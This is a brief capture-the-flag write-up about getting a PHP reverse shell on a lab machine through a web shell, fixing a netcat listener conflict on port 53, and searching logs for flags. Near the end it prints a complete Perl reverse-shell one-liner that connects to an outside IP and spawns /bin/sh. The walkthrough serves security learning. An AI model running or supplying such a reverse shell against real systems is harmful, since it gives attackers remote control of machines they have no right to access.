First Contact
Get a reverseshell
We have identified a potential attack surface that we can use to execute php and shell commands on. We are able to execute a reverse shell on the web shell in order to get a shell back on the machine.
Uploading a php Reverseshell
For the PHP reverse shell, weโll be using Pentest Monkeyโs reverse shell found here or in kali under /usr/share/webshells/php/php-reverse-shell.php
Modify the reverse shell to your tun0 IP address and port.
Paste php code into webshell. Note: First line <?php and last line ?> needs to be removed
start netcat listener on port 53
Execute reverseshell

Problem with netcat listener on port 53

Kill systemd-resolv process and start netcat listener again
Execute the reverseshell:


To answer the questions and find the flag I need to focus myself on logs
Searching for logs: cd /var/log


Getting the root flag

Additional way to get a reverseshell

perl -e 'use Socket;$i="10.50.133.33";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Questions

Last updated
Was this helpful?